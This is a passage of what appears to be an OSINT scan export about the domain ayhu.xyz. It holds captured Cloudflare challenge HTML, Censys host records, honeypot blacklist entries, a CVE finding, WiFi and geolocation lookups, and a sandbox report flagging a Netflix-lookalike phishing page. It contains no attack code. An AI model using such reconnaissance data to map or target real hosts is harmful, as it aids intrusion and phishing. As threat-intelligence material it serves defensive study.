R3lvIMsLJW_0OugCzVwa7bbjSi3yNlNTmyyZSUaQHqMOYwEHt04GQZ_JQBpDCQvIGLq1fOLeArqr97ZPrGgk_x7n2c6MIQK0vFFlSI1sI8OS4yi8D0V-GNr2Bt_G2Ue_TKIZGNfQPaWAM0jGlpc1nPWIZS-sYxW-8ui-6eexGBFZ5-zLr2uaHNG_xNol2Di7iRI4TW5JoZOZTUx2wSZVCmafA5viAw12czMeK4Ymm36GiAo0mTnIrrghObXpHRydCjEOD-ie6KdVTajZGWvZP24dk25nzrx7uELmxfIPaAvIALx9AdiYBCbeQ0Yz_UH9uDQF6Eh_AqthmXwQQH1F4IA_32McFzcxir6Txr6Mur3t22mOZF963IcNMqvP7vPcccq_rufb25sF8o6nhmaVg8cgPEKIwNeq8Yai0pVnLlllLMVSWIHePNfLuLOdg9LDG1pq1rafu4Rgb-yc2Aoh4enGvHZkuRe6wlOLCDdREAADDoXkFVowEW_DGLxK1pMON0uU78NiTV9_r2o4osZBaOPn8heMmK90xPpnLokgH3gubppwq1gfmaT0RIIPWt7RVKpJRXQ_wSjLVjILALRXQY6PbelUym6TQ1z5fJfHRmrHxVnQvY6aogsFcFGtQVSrl8OCNEwv9P3oaH1GWxoSabHdrSKZmlLs2m-l9LJf4El9FKIA3NBr09u94xMLRSPmEHb4Ol-KPCw5RJiAwyBy2nrohjehlLLjGIgbGh_hTPi8G-yGwVEOyQB8GJBts_O8-g8mz65tw5NpdS_SbFPOasS6txd-b_DzeOnkkcJgqOwM_x3VH39HvzlVBkxqyTu-7yh1ffXA3EAxe-TkXe6foRnX1wH3iJh2_MCDDGxTOkk8Xj59t6wAawmHCKnU2CvogDUE">
</form>
</div>
</div>
<script>
(function(){
window._cf_chl_opt={
cvId: '2',
cZone: 'ayhu.xyz',
cType: 'managed',
cNounce: '13063',
cRay: '7c5f8c5e7988238a',
cHash: 'ba708169066f393',
cUPMDTk: "\/?__cf_chl_tk=VqQIpv85XrbB73FISUPAb3YOKzrkafpohMHe42yb99c-1683861862-0-gaNycGzNChA",
cFPWv: 'b',
cTTimeMs: '1000',
cMTimeMs: '0',
cTplV: 5,
cTplB: 'cf',
cK: "",
cRq: {
ru: 'aHR0cHM6Ly9heWh1Lnh5ei8=',
ra: 'TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4w',
rm: 'R0VU',
d: 'YtLw1r+G4BXsd0FkRMvka85wm7Lw/iR0rXUYENjW5JZbvNWZBYa0q0+Il8LjyNehJabAqUtaWf767wbCNaYgySnBqnpPsMoOa0cKWt1fZp4gdy+C8LU/pGEGRmyTt+1SC3FdTYu6cI8WiDs6EYfaolZ1Q4GzSM9aW8XcriqivgIDXT1BzBjJwTzpAp1U3aRGBhldnftnEosz5IN8cZ/ZfjD59KxZxCk4YJ82hAC/4p5NK53nkqtCB8+yebFdC+eEhhByuy+cDGuW019GQtjFSS9CeSHMkq0X5vvnjvWzUwgZWatWT4cb7H1DRCSbe56JnIW2SqUEUemPQIyx8r8XETw2r/jfEGJaIkWc0xNQcTIwyTo7s7DjvWVDpJZwE8RGlfo+XMla1yJOLJeQ4p8yS62WkxGCezqaUSIRC9W7/EJZB2hizQMBsQ33Qut7vH5/uRFNuCVFUoIv1B6FDgjnGpAfl6VMz5kByy7JL0ytkDTuSpiY63YcvOGMdbIIR3h4udGCBX1zULf54DaAq4yJPJFFrDJ28oS3TKgFFoFGJa2VsTR4xn/6LIYLPcOgI6uz',
t: 'MTY4Mzg2MTg2Mi4xNjAwMDA=',
m: 'c3pqWAYwgRkhuI1rZgTpwNhg2e/0sRGYZUtHGzVigsI=',
i1: 'NNf66iKUbSi3dpVZsq8TXQ==',
i2: 'dYlWHTj6TB0dDvgfdZy2xA==',
zh: '5CSFfnxjX733uDcOs5b2wVtZyxz+ok/bRl8GY+r6VYM=',
uh: 'kmwDWEJPoYUZn2LK7fziBR63kfsS15IQSFUgqqBKdMU=',
hh: 'MOFk2Z71D85oDgM12X+iKPzOW00XacPzwtfsLetPJXU=',
}
};
var trkjs = document.createElement('img');
trkjs.setAttribute('src', '/cdn-cgi/images/trace/managed/js/transparent.gif?ray=7c5f8c5e7988238a');
trkjs.setAttribute('alt', '');
trkjs.setAttribute('style', 'display: none');
document.body.appendChild(trkjs);
var cpo = document.createElement('script');
cpo.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/managed/v1?ray=7c5f8c5e7988238a';
window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;
window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;
if (window.history && window.history.replaceState) {
var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;
history.replaceState(null, null, "\/?__cf_chl_rt_tk=VqQIpv85XrbB73FISUPAb3YOKzrkafpohMHe42yb99c-1683861862-0-gaNycGzNChA" + window._cf_chl_opt.cOgUHash);
cpo.onload = function() {
history.replaceState(null, null, ogU);
};
}
document.getElementsByTagName('head')[0].appendChild(cpo);
}());
</script>
</body>
</html>
|
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | MOZAMBIQUE345 (Net ID: 00:01:E3:54:D4:57) | 52.3759, 4.8975 |
| 2023-05-12 02:54:57 | Raw Data from RIRs | No | Censys | 0 | 0 | 2 | 0 | None | {"last_updated_at": "2023-05-08T23:15:43.655Z", "ip": "2a06:98c1:3120::1", "location_updated_at": "2023-04-30T00:57:18.734276Z", "autonomous_system_updated_at": "2023-04-30T00:57:18.734351Z", "location": {"province": "England", "city": "Hounslow", "country": "United Kingdom", "coordinates": {"latitude": 51.46839, "longitude": -0.36092}, "postal_code": "TW3", "country_code": "GB", "timezone": "Europe/London", "continent": "Europe"}, "dns": {"records": {"karriere-job-booster.com": {"record_type": "AAAA", "resolved_at": "2023-03-23T15:40:36.428770073Z"}, "uncoveryourconfidence.org": {"record_type": "AAAA", "resolved_at": "2023-03-24T20:43:37.500409594Z"}, "panel.moeking.me": {"record_type": "AAAA", "resolved_at": "2022-09-28T16:39:39.161526355Z"}, "sub.133335.xyz": {"record_type": "AAAA", "resolved_at": "2022-10-03T20:37:50.410080500Z"}, "kfplastics.com.au": {"record_type": "AAAA", "resolved_at": "2023-04-15T12:22:37.294872821Z"}, "ozvi.net": {"record_type": "AAAA", "resolved_at": "2023-05-07T20:04:48.328410124Z"}, "romainebrain.dev": {"record_type": "AAAA", "resolved_at": "2023-02-18T04:11:46.139927410Z"}, "persaldo-treuhand.ch": {"record_type": "AAAA", "resolved_at": "2023-01-07T12:29:30.392242949Z"}, "133335.xyz": {"record_type": "AAAA", "resolved_at": "2022-10-05T17:45:47.967622672Z"}, "static.sampledu.com": {"record_type": "AAAA", "resolved_at": "2023-02-01T22:23:03.363402875Z"}, "cpcontacts.madares.app": {"record_type": "AAAA", "resolved_at": "2023-04-16T12:14:57.712576745Z"}, "vadyba.lt": {"record_type": "AAAA", "resolved_at": "2023-03-19T16:29:40.486687881Z"}, "openspeedtest.ovride.net": {"record_type": "AAAA", "resolved_at": "2023-05-07T20:05:02.904720123Z"}, "www.3e-wellness.com": {"record_type": "AAAA", "resolved_at": "2023-05-07T20:03:48.794666765Z"}, "sign.moeking.me": {"record_type": "AAAA", "resolved_at": "2022-09-28T16:39:39.465293148Z"}, "405.hjs.my.id": {"record_type": "AAAA", "resolved_at": "2023-04-12T11:14:59.074372516Z"}, "password.moeking.me": {"record_type": "AAAA", "resolved_at": "2022-09-25T16:38:19.046997106Z"}, "mail.wolny.poker": {"record_type": "AAAA", "resolved_at": "2022-10-30T17:30:49.591604261Z"}, "www.133335.xyz": {"record_type": "AAAA", "resolved_at": "2022-09-25T19:02:08.754559807Z"}, "beautybeyondhair.net": {"record_type": "AAAA", "resolved_at": "2023-04-07T18:46:00.761081322Z"}, "beautybeyondhair.buzz": {"record_type": "AAAA", "resolved_at": "2023-04-15T12:48:08.422852392Z"}, "wolny.poker": {"record_type": "AAAA", "resolved_at": "2022-10-23T17:07:04.797789596Z"}, "askapkmod.com": {"record_type": "AAAA", "resolved_at": "2022-12-26T12:52:46.077237913Z"}, "gbdfdm.cn": {"record_type": "AAAA", "resolved_at": "2023-02-17T02:28:21.988085793Z"}, "www.cylindermowers.com.au": {"record_type": "AAAA", "resolved_at": "2023-04-15T12:22:39.710895641Z"}, "moeking.me": {"record_type": "AAAA", "resolved_at": "2022-09-30T15:32:44.686639976Z"}, "gh.133335.xyz": {"record_type": "AAAA", "resolved_at": "2022-09-24T19:46:42.025854438Z"}, "karriere-job-booster.at": {"record_type": "AAAA", "resolved_at": "2023-04-30T12:17:10.484433310Z"}, "www.wolny.poker": {"record_type": "AAAA", "resolved_at": "2022-10-16T17:06:44.448663582Z"}, "de.133335.xyz": {"record_type": "AAAA", "resolved_at": "2022-10-04T17:06:49.855589981Z"}}, "names": ["www.wolny.poker", "www.133335.xyz", "wolny.poker", "uncoveryourconfidence.org", "karriere-job-booster.com", "static.sampledu.com", "ozvi.net", "de.133335.xyz", "panel.moeking.me", "gh.133335.xyz", "sub.133335.xyz", "www.cylindermowers.com.au", "vadyba.lt", "beautybeyondhair.buzz", "cpcontacts.madares.app", "133335.xyz", "kfplastics.com.au", "openspeedtest.ovride.net", "password.moeking.me", "405.hjs.my.id", "beautybeyondhair.net", "moeking.me", "romainebrain.dev", "sign.moeking.me", "www.3e-wellness.com", "gbdfdm.cn", "persaldo-treuhand.ch", "karriere-job-booster.at", "askapkmod.com", "mail.wolny.poker"]}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "http": {"request": {"headers": {"_encoding": {"User_Agent": "DISPLAY_UTF8", "Accept": "DISPLAY_UTF8"}, "User_Agent": ["Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"], "Accept": ["*/*"]}, "method": "GET", "uri": "http://[2a06:98c1:3120::1]/"}, "response": {"body": "<!DOCTYPE html>\n<!--[if lt IE 7]> <html class=\"no-js ie6 oldie\" lang=\"en-US\"> <![endif]-->\n<!--[if IE 7]> <html class=\"no-js ie7 oldie\" lang=\"en-US\"> <![endif]-->\n<!--[if IE 8]> <html class=\"no-js ie8 oldie\" lang=\"en-US\"> <![endif]-->\n<!--[if gt IE 8]><!--> <html class=\"no-js\" lang=\"en-US\"> <!--<![endif]-->\n<head>\n<title>Direct IP access not allowed | Cloudflare</title>\n<meta charset=\"UTF-8\" />\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\" />\n<meta http-equiv=\"X-UA-Compatible\" content=\"IE=Edge\" />\n<meta name=\"robots\" content=\"noindex, nofollow\" />\n<meta name=\"viewport\" content=\"width=device-width,initial-scale=1\" />\n<link rel=\"stylesheet\" id=\"cf_styles-css\" href=\"/cdn-cgi/styles/main.css\" />\n\n\n<script>\n(function(){if(document.addEventListener&&window.XMLHttpRequest&&JSON&&JSON.stringify){var e=function(a){var c=document.getElementById(\"error-feedback-survey\"),d=document.getElementById(\"error-feedback-success\"),b=new XMLHttpRequest;a={event:\"feedback clicked\",properties:{errorCode:1003,helpful:a,version:1}};b.open(\"POST\",\"https://sparrow.cloudflare.com/api/v1/event\");b.setRequestHeader(\"Content-Type\",\"application/json\");b.setRequestHeader(\"Sparrow-Source-Key\",\"c771f0e4b54944bebf4261d44bd79a1e\");\nb.send(JSON.stringify(a));c.classList.add(\"feedback-hidden\");d.classList.remove(\"feedback-hidden\")};document.addEventListener(\"DOMContentLoaded\",function(){var a=document.getElementById(\"error-feedback\"),c=document.getElementById(\"feedback-button-yes\"),d=document.getElementById(\"feedback-button-no\");\"classList\"in a&&(a.classList.remove(\"feedback-hidden\"),c.addEventListener(\"click\",function(){e(!0)}),d.addEventListener(\"click\",function(){e(!1)}))})}})();\n</script>\n\n<script defer src=\"https://performance.radar.cloudflare.com/beacon.js\"></script>\n</head>\n<body>\n <div id=\"cf-wrapper\">\n <div class=\"cf-alert cf-alert-error cf-cookie-error hidden\" id=\"cookie-alert\" data-translate=\"enable_cookies\">Please enable cookies.</div>\n <div id=\"cf-error-details\" class=\"p-0\">\n <header class=\"mx-auto pt-10 lg:pt-6 lg:px-8 w-240 lg:w-full mb-15 antialiased\">\n <h1 class=\"inline-block md:block mr-2 md:mb-2 font-light text-60 md:text-3xl text-black-dark leading-tight\">\n <span data-translate=\"error\">Error</span>\n <span>1003</span>\n </h1>\n <span class=\"inline-block md:block heading-ray-id font-mono text-15 lg:text-sm lg:leading-relaxed\">Ray ID: 7c443d4879e76326 •</span>\n <span class=\"inline-block md:block heading-ray-id font-mono text-15 lg:text-sm lg:leading-relaxed\">2023-05-08 19:51:47 UTC</span>\n <h2 class=\"text-gray-600 leading-1.3 text-3xl lg:text-2xl font-light\">Direct IP access not allowed</h2>\n </header>\n\n <section class=\"w-240 lg:w-full mx-auto mb-8 lg:px-8\">\n <div id=\"what-happened-section\" class=\"w-1/2 md:w-full\">\n <h2 class=\"text-3xl leading-tight font-normal mb-4 text-black-dark antialiased\" data-translate=\"what_happened\">What happened?</h2>\n <p>You've requested an IP address that is part of the <a href=\"https://www.cloudflare.com/5xx-error-landing/\" target=\"_blank\">Cloudflare</a> network. A valid Host header must be supplied to reach the desired website.</p>\n \n </div>\n\n \n <div id=\"resolution-copy-section\" class=\"w-1/2 mt-6 text-15 leading-normal\">\n <h2 class=\"text-3xl leading-tight font-normal mb-4 text-black-dark antialiased\" data-translate=\"what_can_i_do\">What can I do?</h2>\n <p>If you are interested in learning more about Cloudflare, please <a href=\"https://www.cloudflare.com/5xx-error-landing/\" target=\"_blank\">visit our website</a>.</p>\n </div>\n \n </section>\n\n <div class=\"feedback-hidden py-8 text-center\" id=\"error-feedback\">\n <div id=\"error-feedback-survey\" class=\"footer-line-wrapper\">\n Was this page helpful?\n <button class=\"border border-solid bg-white cf-button cursor-pointer ml-4 px-4 py-2 rounded\" id=\"feedback-button-yes\" type=\"button\">Yes</button>\n <button class=\"border border-solid bg-white cf-button cursor-pointer ml-4 px-4 py-2 rounded\" id=\"feedback-button-no\" type=\"button\">No</button>\n </div>\n <div class=\"feedback-success feedback-hidden\" id=\"error-feedback-success\">\n Thank you for your feedback!\n </div>\n</div>\n\n\n <div class=\"cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300\">\n <p class=\"text-13\">\n <span class=\"cf-footer-item sm:block sm:mb-1\">Cloudflare Ray ID: <strong class=\"font-semibold\">7c443d4879e76326</strong></span>\n <span class=\"cf-footer-separator sm:hidden\">•</span>\n <span id=\"cf-footer-item-ip\" class=\"cf-footer-item hidden sm:block sm:mb-1\">\n Your IP:\n <button type=\"button\" id=\"cf-footer-ip-reveal\" class=\"cf-footer-ip-reveal-btn\">Click to reveal</button>\n <span class=\"hidden\" id=\"cf-footer-ip\">2602:80d:1000:b0cc:e:2:5:7</span>\n <span class=\"cf-footer-separator sm:hidden\">•</span>\n </span>\n <span class=\"cf-footer-item sm:block sm:mb-1\"><span>Performance & security by</span> <a rel=\"noopener noreferrer\" href=\"https://www.cloudflare.com/5xx-error-landing\" id=\"brand_link\" target=\"_blank\">Cloudflare</a></span>\n \n </p>\n <script>(function(){function d(){var b=a.getElementById(\"cf-footer-item-ip\"),c=a.getElementById(\"cf-footer-ip-reveal\");b&&\"classList\"in b&&(b.classList.remove(\"hidden\"),c.addEventListener(\"click\",function(){c.classList.add(\"hidden\");a.getElementById(\"cf-footer-ip\").classList.remove(\"hidden\")}))}var | 2a06:98c1:3120::1 |
| 2023-05-12 03:01:31 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.64): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:09:18 | Vulnerability - General | Yes | Tool - Retire.js | 0 | 0 | 4 | 0 | None | CVE-2018-14042
Score: Unknown
Description: Unknown | https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js |
| 2023-05-12 03:11:21 | Physical Location | No | AbstractAPI | 0 | 0 | 3 | 0 | None | Frankfurt am Main, Hesse, 60313, Germany, Europe | 46.101.229.70 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | FruityWifi-004
(Net ID: 00:04:E2:F4:8A:F5) | 33.6170672,-111.90564645297056 |
| 2023-05-12 03:01:18 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.158): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:44:22 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | githubusercontent.com | 185.199.108.153 |
| 2023-05-12 02:48:03 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'https://gabu0912.github.io/netflux/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_e10_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "IsoScope_e10_IESQMMUTEX_0_519"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_e10_IESQMMUTEX_0_331"\n "Local\\ZonesCacheCounterMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3600"\n "IsoScope_e10_ConnHashTable<3600>_HashTable_Mutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_e10_IESQMMUTEX_0_303"\n "Local\\VERMGMTBlockListFileMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_e10_IE_EarlyTabStart_0x880_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.110.153:443"\n "104.194.8.120:443"\n "52.155.62.95:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"gabu0912.github.io"\n "i.ibb.co"\n "query.prod.cms.msn.com"\n "teredo.ipv6.microsoft.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string "Watch right on Netflix.com." (Indicator: "dir "; File: "netflux_1_.htm")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar37C6.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar3023.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar2DAE.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar2F85.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar2CA1.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar2CD1.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-56', u'name': u'Drops files with image extension', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"background_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 2000x1125 components 3" and extension "jpg"\n "tab-content-2-1_1_.png" has type "PNG image data 561 x 379 8-bit/color RGBA non-interlaced" and extension "png"\n "tab-content-2-3_1_.png" has type "PNG image data 552 x 338 8-bit/color RGBA non-interlaced" and extension "png"\n "tab-content-1_1_.png" has type "PNG image data 915 x 649 8-bit/color RGBA non-interlaced" and extension "png"\n "tab-content-2-2_1_.png" has type "PNG image data 488 x 312 8-bit/color RGBA non-interlaced" and extension "png"\n "logo_1_.png" has type "PNG image data 329 x 88 8-bit/color RGBA non-interlaced" and extension "png"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"Cab2C80.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab2C80.tmp]- [targetUID: 00000000-00002972]\n "Cab37C5.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab37C5.tmp]- [targetUID: 00000000-00002972]\n "Cab2F84.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab2F84.tmp]- [targetUID: 00000000-00002972]\n "Cab3022.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab3022.tmp]- [targetUID: 00000000-00002972]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002972]\n "Cab2CC1.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab2CC1.tmp]- [targetUID: 00000000-00002972]\n "Cab2DAD.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab2DAD.tmp]- [targetUID: 00000000-00002972]'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~dfe78175b9357b566b.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{616d4f39-ebb5-11ed-9a79-08002777c70f}.dat"\n "iexplore.exe" reads file "c:\\windows\\fonts\\staticcache.dat"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df550c4a9bcc627f72.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{616d4f3b-ebb5-11ed-9a79-08002777c70f}.dat"\n "iexplore.exe" reads file "c:\\users\\desktop.ini"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\favorites\\desktop.ini"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\desktop\\desktop.ini"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{616d4f39-ebb5-11ed-9a79-08002777c70f}.dat"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\temp\\~dfe78175b9357b566b.tmp"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{616d4f3b-ebb5-11ed-9a79-08002777c70f}.dat"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df550c4a9bcc627f72.tmp"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "background_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 2000x1125 components 3"- [targetUID: N/A]\n "tab-content-2-1_1_.png" has type "PNG image data 561 x 379 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "tab-content-2-3_1_.png" has type "PNG image data 552 x 338 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "tab-content-1_1_.png" has type "PNG image data 915 x 649 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "Tar37C6.tmp" has type "data"- Location: [%TEMP%\\Tar37C6.tmp]- [targetUID: 00000000-00002972]\n "tab-content-2-2_1_.png" has type "PNG image data 488 x 312 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "Cab2C80.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab2C80.tmp]- [targetUID: 00000000-00002972]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00003600]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has | 185.199.110.153 |
| 2023-05-12 02:46:17 | Affiliate Description - Category | No | DuckDuckGo | 0 | 0 | 3 | 0 | None | Microsoft subsidiaries | cdn-185-199-111-153.github.com |
| 2023-05-12 03:01:33 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.84): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:03:16 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | www.ayhu.xyz | [{u'not_after': u'2023-07-10T04:54:49', u'not_before': u'2023-04-11T04:54:50', u'issuer_ca_id': 180753, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5', u'common_name': u'*.ayhu.xyz', u'serial_number': u'0d408dd97ca1bd4c0d06c53fc3e92ebc', u'entry_timestamp': u'2023-04-11T05:54:51.221', u'id': 9117673170}, {u'not_after': u'2023-05-12T05:22:09', u'not_before': u'2023-02-11T05:22:10', u'issuer_ca_id': 180753, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5', u'common_name': u'*.ayhu.xyz', u'serial_number': u'0ce3f41ce8cbbbcf13f76c6f365ec2eb', u'entry_timestamp': u'2023-02-11T06:22:11.299', u'id': 8627857885}, {u'not_after': u'2023-03-14T04:12:31', u'not_before': u'2022-12-14T04:12:32', u'issuer_ca_id': 183283, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=E1", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0310b430a3e0722fec4ebc95e312bb838d6f', u'entry_timestamp': u'2022-12-14T05:12:32.333', u'id': 8209207679}, {u'not_after': u'2023-03-14T04:12:31', u'not_before': u'2022-12-14T04:12:32', u'issuer_ca_id': 183283, u'name_value': 